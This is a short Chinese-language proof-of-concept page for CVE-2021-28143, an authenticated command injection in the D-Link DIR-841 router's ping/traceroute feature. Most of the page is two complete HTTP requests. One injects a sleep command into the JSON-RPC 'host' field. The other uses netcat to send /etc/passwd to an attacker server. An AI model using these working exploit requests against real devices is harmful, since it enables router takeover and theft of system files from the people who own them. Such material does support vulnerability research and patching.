# D-LINK DIR-841 命令注入（CVE-2021-28143）


D-Link DIR-841 3.03和3.04 存在经过身份验证的命令注入，通过“系统工具”（ping/ping6/traceroute）命令注入，可导致攻击者进行完全控制设备。

PoC：


```
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=<session>

{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & sleep 5'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
```

Exfiltrating files


```
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=<session>

{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
```

ref：

* https://nvd.nist.gov/vuln/detail/CVE-2021-28143
* https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt